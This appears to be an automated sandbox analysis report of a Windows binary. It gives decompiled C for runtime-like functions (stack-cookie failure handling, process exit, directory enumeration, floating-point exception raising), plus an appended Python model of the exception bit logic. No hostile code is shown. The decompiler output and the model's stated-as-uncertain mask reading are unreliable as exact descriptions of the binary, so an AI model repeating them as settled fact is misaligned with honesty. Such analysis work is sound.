                                              				intOrPtr _v548;
                                              				intOrPtr _v552;
                                              				intOrPtr _v556;
                                              				intOrPtr _v560;
                                              				intOrPtr _v564;
                                              				intOrPtr _v568;
                                              				intOrPtr _v572;
                                              				intOrPtr _v576;
                                              				intOrPtr _v580;
                                              				intOrPtr _v584;
                                              				char _v724;
                                              				intOrPtr _v792;
                                              				intOrPtr _v800;
                                              				char _v804;
                                              				struct _EXCEPTION_POINTERS _v812;
                                              				signed int _t40;
                                              				char* _t47;
                                              				char* _t49;
                                              				intOrPtr _t61;
                                              				intOrPtr _t62;
                                              				intOrPtr _t66;
                                              				intOrPtr _t67;
                                              				int _t68;
                                              				intOrPtr _t69;
                                              				signed int _t70;
                                              
                                              				_t69 = __esi;
                                              				_t67 = __edi;
                                              				_t66 = __edx;
                                              				_t61 = __ebx;
                                              				_t40 =  *0x304018; // 0x9021af28
                                              				_t41 = _t40 ^ _t70;
                                              				_v8 = _t40 ^ _t70;
                                              				if(_a4 != 0xffffffff) {
                                              					_push(_a4);
                                              					E002F1768(_t41);
                                              					_pop(_t62);
                                              				}
                                              				E002F1D00(_t67,  &_v804, 0, 0x50);
                                              				E002F1D00(_t67,  &_v724, 0, 0x2cc);
                                              				_v812.ExceptionRecord =  &_v804;
                                              				_t47 =  &_v724;
                                              				_v812.ContextRecord = _t47;
                                              				_v548 = _t47;
                                              				_v552 = _t62;
                                              				_v556 = _t66;
                                              				_v560 = _t61;
                                              				_v564 = _t69;
                                              				_v568 = _t67;
                                              				_v524 = ss;
                                              				_v536 = cs;
                                              				_v572 = ds;
                                              				_v576 = es;
                                              				_v580 = fs;
                                              				_v584 = gs;
                                              				asm("pushfd");
                                              				_pop( *_t22);
                                              				_v540 = _v0;
                                              				_t49 =  &_v0;
                                              				_v528 = _t49;
                                              				_v724 = 0x10001;
                                              				_v544 =  *((intOrPtr*)(_t49 - 4));
                                              				_v804 = _a8;
                                              				_v800 = _a12;
                                              				_v792 = _v0;
                                              				_t68 = IsDebuggerPresent();
                                              				SetUnhandledExceptionFilter(0);
                                              				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
                                              					_push(_a4);
                                              					E002F1768(_t57);
                                              				}
                                              				return E002F19D1(_v8 ^ _t70);
			}

                                              0x002f3d62
                                              0x002f3d62
                                              0x002f3d62
                                              0x002f3d62
                                              0x002f3d6d
                                              0x002f3d72
                                              0x002f3d74
                                              0x002f3d7c
                                              0x002f3d7e
                                              0x002f3d81
                                              0x002f3d86
                                              0x002f3d86
                                              0x002f3d92
                                              0x002f3da5
                                              0x002f3db3
                                              0x002f3db9
                                              0x002f3dbf
                                              0x002f3dc5
                                              0x002f3dcb
                                              0x002f3dd1
                                              0x002f3dd7
                                              0x002f3ddd
                                              0x002f3de3
                                              0x002f3de9
                                              0x002f3df0
                                              0x002f3df7
                                              0x002f3dfe
                                              0x002f3e05
                                              0x002f3e0c
                                              0x002f3e13
                                              0x002f3e14
                                              0x002f3e1d
                                              0x002f3e23
                                              0x002f3e26
                                              0x002f3e2c
                                              0x002f3e39
                                              0x002f3e42
                                              0x002f3e4b
                                              0x002f3e54
                                              0x002f3e62
                                              0x002f3e64
                                              0x002f3e79
                                              0x002f3e85
                                              0x002f3e88
                                              0x002f3e8d
                                              0x002f3e9c

                                              APIs
                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 002F3E5A
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 002F3E64
                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 002F3E71
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
• Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
• Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                              • String ID:
                                              • API String ID: 3906539128-0
                                              • Opcode ID: 22fd4b3a75afaaaeafa6a1c0b89a9adf53db8bcf8fa96e74de3767b39c658fc2
                                              • Instruction ID: 0f19e63b96914d05b762b3c4f8ef7e19820dccba9e2bfd111bae77855ba9c911
                                              • Opcode Fuzzy Hash: 22fd4b3a75afaaaeafa6a1c0b89a9adf53db8bcf8fa96e74de3767b39c658fc2
                                              • Instruction Fuzzy Hash: AA31F47491121CABCB21DF24DC88B9CBBB8AF08750F5041EAE90CA7260EB709F91CF44
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002F2E0B(int _a4) {
                                              				void* _t14;
                                              				void* _t16;
                                              
                                              				if(E002F5386(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                                              					TerminateProcess(GetCurrentProcess(), _a4);
                                              				}
                                              				E002F2E90(_t14, _t16, _a4);
                                              				ExitProcess(_a4);
			}

                                              0x002f2e17
                                              0x002f2e33
                                              0x002f2e33
                                              0x002f2e3c
                                              0x002f2e45

                                              APIs
                                              • GetCurrentProcess.KERNEL32(00000003,?,002F2DE1,00000003,00302E60,0000000C,002F2F38,00000003,00000002,00000000,?,002F3726,00000003), ref: 002F2E2C
                                              • TerminateProcess.KERNEL32(00000000,?,002F2DE1,00000003,00302E60,0000000C,002F2F38,00000003,00000002,00000000,?,002F3726,00000003), ref: 002F2E33
                                              • ExitProcess.KERNEL32 ref: 002F2E45
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
• Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
• Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Process$CurrentExitTerminate
                                              • String ID:
                                              • API String ID: 1703294689-0
                                              • Opcode ID: d694636245e0cb446070de98e81bb5eb39d943296c092721ab2221ee704652f2
                                              • Instruction ID: f5d55871ed91bdbac2dff70aa0d36769841463f0d34184559039e61e472cedde
                                              • Opcode Fuzzy Hash: d694636245e0cb446070de98e81bb5eb39d943296c092721ab2221ee704652f2
                                              • Instruction Fuzzy Hash: DAE04631010208EFCF026F54ED0CA697F2AEF113D2B114438FA04AA131CB75EC66CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 72%
                                              			E002F431C(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                                              				intOrPtr _v8;
                                              				signed int _v12;
                                              				intOrPtr _v28;
                                              				signed int _v32;
                                              				WCHAR* _v36;
                                              				signed int _v48;
                                              				intOrPtr _v556;
                                              				intOrPtr _v558;
                                              				struct _WIN32_FIND_DATAW _v604;
                                              				intOrPtr* _v608;
                                              				signed int _v612;
                                              				signed int _v616;
                                              				intOrPtr _v644;
                                              				intOrPtr _v648;
                                              				signed int _t40;
                                              				signed int _t45;
                                              				signed int _t48;
                                              				signed int _t50;
                                              				signed int _t51;
                                              				signed char _t53;
                                              				signed int _t62;
                                              				void* _t64;
                                              				union _FINDEX_INFO_LEVELS _t66;
                                              				signed int _t71;
                                              				intOrPtr* _t72;
                                              				signed int _t75;
                                              				void* _t82;
                                              				void* _t84;
                                              				signed int _t85;
                                              				void* _t89;
                                              				WCHAR* _t90;
                                              				intOrPtr* _t94;
                                              				intOrPtr _t97;
                                              				void* _t99;
                                              				signed int _t100;
                                              				intOrPtr* _t104;
                                              				signed int _t107;
                                              				void* _t110;
                                              				intOrPtr _t111;
                                              				void* _t112;
                                              				void* _t114;
                                              				void* _t115;
                                              				signed int _t117;
                                              				void* _t118;
                                              				union _FINDEX_INFO_LEVELS _t119;
                                              				void* _t124;
                                              				void* _t125;
                                              				signed int _t126;
                                              				void* _t127;
                                              				signed int _t132;
                                              				void* _t133;
                                              				signed int _t134;
                                              				void* _t135;
                                              				void* _t136;
                                              
                                              				_push(__ecx);
                                              				_t94 = _a4;
                                              				_push(__ebx);
                                              				_push(__edi);
                                              				_t2 = _t94 + 2; // 0x2
                                              				_t110 = _t2;
                                              				do {
                                              					_t40 =  *_t94;
                                              					_t94 = _t94 + 2;
                                              				} while (_t40 != 0);
                                              				_t117 = _a12;
                                              				_t97 = (_t94 - _t110 >> 1) + 1;
                                              				_v8 = _t97;
                                              				if(_t97 <= (_t40 | 0xffffffff) - _t117) {
                                              					_push(__esi);
                                              					_t5 = _t117 + 1; // 0x1
                                              					_t89 = _t5 + _t97;
                                              					_t124 = E002F3727(_t97, _t89, 2);
                                              					_pop(_t99);
                                              					__eflags = _t117;
                                              					if(_t117 == 0) {
                                              						L6:
                                              						_push(_v8);
                                              						_t89 = _t89 - _t117;
                                              						_t45 = E002F40A0(_t99, _t124 + _t117 * 2, _t89, _a4);
                                              						_t134 = _t133 + 0x10;
                                              						__eflags = _t45;
                                              						if(__eflags != 0) {
                                              							goto L9;
                                              						} else {
                                              							_t82 = E002F4595(_a16, _t110, __eflags, _t124);
                                              							E002F365C(0);
                                              							_t84 = _t82;
                                              							goto L8;
                                              						}
                                              					} else {
                                              						_push(_t117);
                                              						_t85 = E002F40A0(_t99, _t124, _t89, _a8);
                                              						_t134 = _t133 + 0x10;
                                              						__eflags = _t85;
                                              						if(_t85 != 0) {
                                              							L9:
                                              							_push(0);
                                              							_push(0);
                                              							_push(0);
                                              							_push(0);
                                              							_push(0);
                                              							E002F3F3C();
                                              							asm("int3");
                                              							_t132 = _t134;
                                              							_t135 = _t134 - 0x260;
                                              							_t48 =  *0x304018; // 0x9021af28
                                              							_v48 = _t48 ^ _t132;
                                              							_t111 = _v28;
                                              							_t100 = _v32;
                                              							_push(_t89);
                                              							_t90 = _v36;
                                              							_push(_t124);
                                              							_push(_t117);
                                              							_t125 = 0x5c;
                                              							_v644 = _t111;
                                              							_v648 = 0x2f;
                                              							_t118 = 0x3a;
                                              							while(1) {
                                              								__eflags = _t100 - _t90;
                                              								if(_t100 == _t90) {
                                              									break;
                                              								}
                                              								_t50 =  *_t100 & 0x0000ffff;
                                              								__eflags = _t50 - _v612;
                                              								if(_t50 != _v612) {
                                              									__eflags = _t50 - _t125;
                                              									if(_t50 != _t125) {
                                              										__eflags = _t50 - _t118;
                                              										if(_t50 != _t118) {
                                              											_t100 = _t100 - 2;
                                              											__eflags = _t100;
                                              											continue;
                                              										}
                                              									}
                                              								}
                                              								break;
                                              							}
                                              							_t126 =  *_t100 & 0x0000ffff;
                                              							__eflags = _t126 - _t118;
                                              							if(_t126 != _t118) {
                                              								L19:
                                              								_t51 = _t126;
                                              								_t119 = 0;
                                              								_t112 = 0x2f;
                                              								__eflags = _t51 - _t112;
                                              								if(_t51 == _t112) {
                                              									L23:
                                              									_t53 = 1;
                                              									__eflags = 1;
                                              								} else {
                                              									_t114 = 0x5c;
                                              									__eflags = _t51 - _t114;
                                              									if(_t51 == _t114) {
                                              										goto L23;
                                              									} else {
                                              										_t115 = 0x3a;
                                              										__eflags = _t51 - _t115;
                                              										if(_t51 == _t115) {
                                              											goto L23;
                                              										} else {
                                              											_t53 = 0;
                                              										}
                                              									}
                                              								}
                                              								_t103 = (_t100 - _t90 >> 1) + 1;
                                              								asm("sbb eax, eax");
                                              								_v612 =  ~(_t53 & 0x000000ff) & (_t100 - _t90 >> 0x00000001) + 0x00000001;
                                              								E002F1D00(_t119,  &_v604, _t119, 0x250);
                                              								_t136 = _t135 + 0xc;
                                              								_t127 = FindFirstFileExW(_t90, _t119,  &_v604, _t119, _t119, _t119);
                                              								__eflags = _t127 - 0xffffffff;
                                              								if(_t127 != 0xffffffff) {
                                              									_t104 = _v608;
                                              									_t62 =  *((intOrPtr*)(_t104 + 4)) -  *_t104;
                                              									__eflags = _t62;
                                              									_v616 = _t62 >> 2;
                                              									_t64 = 0x2e;
                                              									do {
                                              										__eflags = _v604.cFileName - _t64;
                                              										if(_v604.cFileName != _t64) {
                                              											L36:
                                              											_push(_t104);
                                              											_t66 = E002F431C(_t90, _t104, _t119, _t127,  &(_v604.cFileName), _t90, _v612);
                                              											_t136 = _t136 + 0x10;
                                              											__eflags = _t66;
                                              											if(_t66 != 0) {
                                              												goto L26;
                                              											} else {
                                              												goto L37;
                                              											}
                                              										} else {
                                              											__eflags = _v558 - _t119;
                                              											if(_v558 == _t119) {
                                              												goto L37;
                                              											} else {
                                              												__eflags = _v558 - _t64;
                                              												if(_v558 != _t64) {
                                              													goto L36;
                                              												} else {
                                              													__eflags = _v556 - _t119;
                                              													if(_v556 == _t119) {
                                              														goto L37;
                                              													} else {
                                              														goto L36;
                                              													}
                                              												}
                                              											}
                                              										}
                                              										goto L40;
                                              										L37:
                                              										_t71 = FindNextFileW(_t127,  &_v604);
                                              										_t104 = _v608;
                                              										__eflags = _t71;
                                              										_t64 = 0x2e;
                                              									} while (_t71 != 0);
                                              									_t72 = _t104;
                                              									_t107 = _v616;
                                              									_t113 =  *_t72;
                                              									_t75 =  *((intOrPtr*)(_t72 + 4)) -  *_t72 >> 2;
                                              									__eflags = _t107 - _t75;
                                              									if(_t107 != _t75) {
                                              										E002F6DD0(_t90, _t119, _t127, _t113 + _t107 * 4, _t75 - _t107, 4, E002F4137);
                                              									}
                                              								} else {
                                              									_push(_v608);
                                              									_t66 = E002F431C(_t90, _t103, _t119, _t127, _t90, _t119, _t119);
                                              									L26:
                                              									_t119 = _t66;
                                              								}
                                              								__eflags = _t127 - 0xffffffff;
                                              								if(_t127 != 0xffffffff) {
                                              									FindClose(_t127);
                                              								}
                                              							} else {
                                              								__eflags = _t100 -  &(_t90[1]);
                                              								if(_t100 ==  &(_t90[1])) {
                                              									goto L19;
                                              								} else {
                                              									_push(_t111);
                                              									E002F431C(_t90, _t100, 0, _t126, _t90, 0, 0);
                                              								}
                                              							}
                                              							__eflags = _v12 ^ _t132;
                                              							return E002F19D1(_v12 ^ _t132);
                                              						} else {
                                              							goto L6;
                                              						}
                                              					}
                                              				} else {
                                              					_t84 = 0xc;
                                              					L8:
                                              					return _t84;
                                              				}
                                              				L40:
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID:
                                              • String ID: /
                                              • API String ID: 0-2043925204
                                              • Opcode ID: f1c7ba68bd913ab63c98759891bd8082eb24005fdda64e5b4767862e757065d9
                                              • Instruction ID: e5a9b66d97722e02c8dff227e74bc5f09d8443e8ac97213049dcecdc053635e2
                                              • Opcode Fuzzy Hash: f1c7ba68bd913ab63c98759891bd8082eb24005fdda64e5b4767862e757065d9
                                              • Instruction Fuzzy Hash: BD413A7691021D6BCB24EFB8DC48EBBB778EB84794F6042B9FA05D7180E6709E51CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002F9B35(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
                                              				signed int _t172;
                                              				signed int _t175;
                                              				signed int _t178;
                                              				signed int* _t179;
                                              				signed int _t195;
                                              				signed int _t199;
                                              				signed int _t202;
                                              				void* _t203;
                                              				void* _t206;
                                              				signed int _t209;
                                              				void* _t210;
                                              				signed int _t225;
                                              				unsigned int* _t240;
                                              				signed char _t242;
                                              				signed int* _t250;
                                              				unsigned int* _t256;
                                              				signed int* _t257;
                                              				signed char _t259;
                                              				long _t262;
                                              				signed int* _t265;
                                              
                                              				 *(_a4 + 4) = 0;
                                              				_t262 = 0xc000000d;
                                              				 *(_a4 + 8) = 0;
                                              				 *(_a4 + 0xc) = 0;
                                              				_t242 = _a12;
                                              				if((_t242 & 0x00000010) != 0) {
                                              					_t262 = 0xc000008f;
                                              					 *(_a4 + 4) =  *(_a4 + 4) | 1;
                                              				}
                                              				if((_t242 & 0x00000002) != 0) {
                                              					_t262 = 0xc0000093;
                                              					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
                                              				}
                                              				if((_t242 & 0x00000001) != 0) {
                                              					_t262 = 0xc0000091;
                                              					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
                                              				}
                                              				if((_t242 & 0x00000004) != 0) {
                                              					_t262 = 0xc000008e;
                                              					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                              				}
                                              				if((_t242 & 0x00000008) != 0) {
                                              					_t262 = 0xc0000090;
                                              					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
                                              				}
                                              				_t265 = _a8;
                                              				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
                                              				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
                                              				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
                                              				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
                                              				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
                                              				_t259 = E002F7836(_a4);
                                              				if((_t259 & 0x00000001) != 0) {
                                              					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
                                              				}
                                              				if((_t259 & 0x00000004) != 0) {
                                              					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
                                              				}
                                              				if((_t259 & 0x00000008) != 0) {
                                              					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
                                              				}
                                              				if((_t259 & 0x00000010) != 0) {
                                              					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
                                              				}
                                              				if((_t259 & 0x00000020) != 0) {
                                              					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
                                              				}
                                              				_t172 =  *_t265 & 0x00000c00;
                                              				if(_t172 == 0) {
                                              					 *_a4 =  *_a4 & 0xfffffffc;
                                              				} else {
                                              					if(_t172 == 0x400) {
                                              						_t257 = _a4;
                                              						_t225 =  *_t257 & 0xfffffffd | 1;
                                              						L26:
                                              						 *_t257 = _t225;
                                              						L29:
                                              						_t175 =  *_t265 & 0x00000300;
                                              						if(_t175 == 0) {
                                              							_t250 = _a4;
                                              							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
                                              							L35:
                                              							 *_t250 = _t178;
                                              							L36:
                                              							_t179 = _a4;
                                              							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                                              							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
                                              							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
                                              							if(_a28 == 0) {
                                              								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
                                              								 *((long long*)(_a4 + 0x10)) =  *_a20;
                                              								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                                              								_t254 = _a4;
                                              								_t240 = _a24;
                                              								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
                                              								 *(_a4 + 0x50) =  *_t240;
                                              							} else {
                                              								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
                                              								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
                                              								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
                                              								_t240 = _a24;
                                              								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
                                              								 *(_a4 + 0x50) =  *_t240;
                                              							}
                                              							E002F779C(_t254);
                                              							RaiseException(_t262, 0, 1,  &_a4);
                                              							_t256 = _a4;
                                              							if((_t256[2] & 0x00000010) != 0) {
                                              								 *_t265 =  *_t265 & 0xfffffffe;
                                              							}
                                              							if((_t256[2] & 0x00000008) != 0) {
                                              								 *_t265 =  *_t265 & 0xfffffffb;
                                              							}
                                              							if((_t256[2] & 0x00000004) != 0) {
                                              								 *_t265 =  *_t265 & 0xfffffff7;
                                              							}
                                              							if((_t256[2] & 0x00000002) != 0) {
                                              								 *_t265 =  *_t265 & 0xffffffef;
                                              							}
                                              							if((_t256[2] & 0x00000001) != 0) {
                                              								 *_t265 =  *_t265 & 0xffffffdf;
                                              							}
                                              							_t195 =  *_t256 & 0x00000003;
                                              							if(_t195 == 0) {
                                              								 *_t265 =  *_t265 & 0xfffff3ff;
                                              							} else {
                                              								_t206 = _t195 - 1;
                                              								if(_t206 == 0) {
                                              									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
                                              									L55:
                                              									 *_t265 = _t209;
                                              									L58:
                                              									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
                                              									if(_t199 == 0) {
                                              										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
                                              										L64:
                                              										 *_t265 = _t202;
                                              										L65:
                                              										if(_a28 == 0) {
                                              											 *_t240 = _t256[0x14];
                                              										} else {
                                              											 *_t240 = _t256[0x14];
                                              										}
                                              										return _t202;
                                              									}
                                              									_t203 = _t199 - 1;
                                              									if(_t203 == 0) {
                                              										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
                                              										goto L64;
                                              									}
                                              									_t202 = _t203 - 1;
                                              									if(_t202 == 0) {
                                              										 *_t265 =  *_t265 & 0xfffff3ff;
                                              									}
                                              									goto L65;
                                              								}
                                              								_t210 = _t206 - 1;
                                              								if(_t210 == 0) {
                                              									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
                                              									goto L55;
                                              								}
                                              								if(_t210 == 1) {
                                              									 *_t265 =  *_t265 | 0x00000c00;
                                              								}
                                              							}
                                              							goto L58;
                                              						}
                                              						if(_t175 == 0x200) {
                                              							_t250 = _a4;
                                              							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
                                              							goto L35;
                                              						}
                                              						if(_t175 == 0x300) {
                                              							 *_a4 =  *_a4 & 0xffffffe3;
                                              						}
                                              						goto L36;
                                              					}
                                              					if(_t172 == 0x800) {
                                              						_t257 = _a4;
                                              						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
                                              						goto L26;
                                              					}
                                              					if(_t172 == 0xc00) {
                                              						 *_a4 =  *_a4 | 0x00000003;
                                              					}
                                              				}
                                              			}

Instruction addresses for the listing above (per-line address column of the report, collapsed here): 0x002f9b43 to 0x002f9e25, in the 002F0000 image; the RaiseException call site is 0x002f9d62.

                                              APIs
                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,002F9B30,?,?,00000008,?,?,002F97D0,00000000), ref: 002F9D62
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
• Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
• Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: ExceptionRaise
                                              • String ID:
                                              • API String ID: 3997070919-0
                                              • Opcode ID: 59cf017569c3bdb215957b826b62a8c4e812f513eaf837d4b96d471b42013c0a
                                              • Instruction ID: a1519ca17df22fbec47a6ef73b165b0736cc1fcf2738260c49b0699dfd8183d5
                                              • Opcode Fuzzy Hash: 59cf017569c3bdb215957b826b62a8c4e812f513eaf837d4b96d471b42013c0a
                                              • Instruction Fuzzy Hash: 1BB1413152060DDFD715CF28C48AB65BBE0FF493A4F258669E99ACF2A1C335D9A1CB40
                                              Uniqueness

                                              Uniqueness Score: -1.00%
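
What E002F9B35 computes, as a worked model added by the editor for this report (it is not code from the sample). The five flag tests at the top pick the NTSTATUS passed to RaiseException and set one bit each in the word at _a4+4; the five XOR/mask lines copy inverted control-word bits into _a4+8; the switch blocks encode the rounding field (0xC00) and precision field (0x300) of the control word into the low bits of *_a4; and once RaiseException returns, the record is written back into the control word. The constants are the values of STATUS_INVALID_PARAMETER and the STATUS_FLOAT_* codes, and the record layout matches the CRT's IEEE floating-point exception record; that identification, and the x87 control-word bit positions used in the comments, are the editor's assessment rather than something the report states. The model reproduces every mask exactly as the listing shows it, including one in the precision write-back that an analyst should confirm against the disassembly.

```python
"""Bit-level model of E002F9B35 (editor's added example, not code from the sample).

Reproduces the constant tables and masks in the decompiled listing so the values
handed to RaiseException can be computed for a given flag word and x87 control
word. Assumptions: the NTSTATUS names are the documented values of the constants
in the listing; *_a4 is read as a record whose word at +4 is the cause, at +8 the
enable mask, and at +0 the rounding/precision/operation fields; x87 control-word
bit positions are the usual ones (bit 0 invalid, bit 2 zero-divide, bit 3 overflow,
bit 4 underflow, bit 5 precision, bits 8-9 precision control, bits 10-11 rounding).
"""

STATUS_INVALID_PARAMETER = 0xC000000D        # initial _t262, used when no flag bit is set
STATUS_FLOAT_INEXACT_RESULT = 0xC000008F
STATUS_FLOAT_UNDERFLOW = 0xC0000093
STATUS_FLOAT_OVERFLOW = 0xC0000091
STATUS_FLOAT_DIVIDE_BY_ZERO = 0xC000008E
STATUS_FLOAT_INVALID_OPERATION = 0xC0000090

# (bit tested in _a12, NTSTATUS stored in _t262, bit OR-ed into *(_a4+4)), in the
# order the listing tests them. Each later match overwrites _t262, so with several
# flags set the last matching row wins: invalid operation beats divide-by-zero,
# which beats overflow, then underflow, then inexact.
CAUSE_TABLE = (
    (0x10, STATUS_FLOAT_INEXACT_RESULT, 0x01),
    (0x02, STATUS_FLOAT_UNDERFLOW, 0x02),
    (0x01, STATUS_FLOAT_OVERFLOW, 0x04),
    (0x04, STATUS_FLOAT_DIVIDE_BY_ZERO, 0x08),
    (0x08, STATUS_FLOAT_INVALID_OPERATION, 0x10),
)


def exception_status(flags):
    """Return (NTSTATUS, cause word) as the first block of the listing builds them."""
    status, cause = STATUS_INVALID_PARAMETER, 0
    for flag_bit, ntstatus, cause_bit in CAUSE_TABLE:
        if flags & flag_bit:
            status, cause = ntstatus, cause | cause_bit
    return status, cause


def enable_word(control_word):
    """The five 'x ^ (y ^ x) & mask' lines. *(_a4+8) is zero beforehand, so each
    line just copies one inverted control-word mask bit: a cleared mask bit
    (exception unmasked in the FPU) becomes a set bit in the record."""
    cw = control_word
    return ((~(cw << 4)) & 0x10     # bit 0, invalid      -> 0x10
            | (~(cw << 1)) & 0x08   # bit 2, zero-divide  -> 0x08  (cw + cw == cw << 1)
            | (~(cw >> 1)) & 0x04   # bit 3, overflow     -> 0x04
            | (~(cw >> 3)) & 0x02   # bit 4, underflow    -> 0x02
            | (~(cw >> 5)) & 0x01)  # bit 5, precision    -> 0x01


ROUNDING_TO_RECORD = {0x000: 0, 0x400: 1, 0x800: 2, 0xC00: 3}   # cw & 0xC00 -> bits 0-1
PRECISION_TO_RECORD = {0x000: 2, 0x200: 1, 0x300: 0}            # cw & 0x300 -> bits 2-4


def mode_word(control_word, operation=0, record_word0=0):
    """*_a4 after the two switch blocks and the '_a16 << 5' line. A precision field
    of 0x100 has no case in the listing, so bits 2-4 are left as they were."""
    rec = (record_word0 & ~0x3) | ROUNDING_TO_RECORD[control_word & 0xC00]
    prec = control_word & 0x300
    if prec in PRECISION_TO_RECORD:
        rec = (rec & ~0x1C) | (PRECISION_TO_RECORD[prec] << 2)
    rec = (rec & ~0x1FFE0) | ((operation << 5) & 0x1FFE0)        # operation code, bits 5-16
    return rec & 0xFFFFFFFF


# Write-back after RaiseException returns: each enable bit clears the mask bit it
# came from (the handler may unmask exceptions); rounding is re-encoded exactly.
ENABLE_TO_MASK_BIT = ((0x10, 0x01), (0x08, 0x04), (0x04, 0x08), (0x02, 0x10), (0x01, 0x20))


def control_word_after_handler(control_word, record_word0, enable):
    cw = control_word
    for enable_bit, mask_bit in ENABLE_TO_MASK_BIT:
        if enable & enable_bit:
            cw &= ~mask_bit
    cw = (cw & ~0xC00) | (0x000, 0x400, 0x800, 0xC00)[record_word0 & 3]
    precision = (record_word0 >> 2) & 7
    # The listing shows '& 0xfffff3ff' in the precision cases. That mask clears the
    # rounding bits just written, not the 0x300 precision field; it is reproduced
    # literally here and is worth confirming in the disassembly before relying on it.
    if precision == 0:
        cw = (cw & 0xFFFFF3FF) | 0x300
    elif precision == 1:
        cw = (cw & 0xFFFFF3FF) | 0x200
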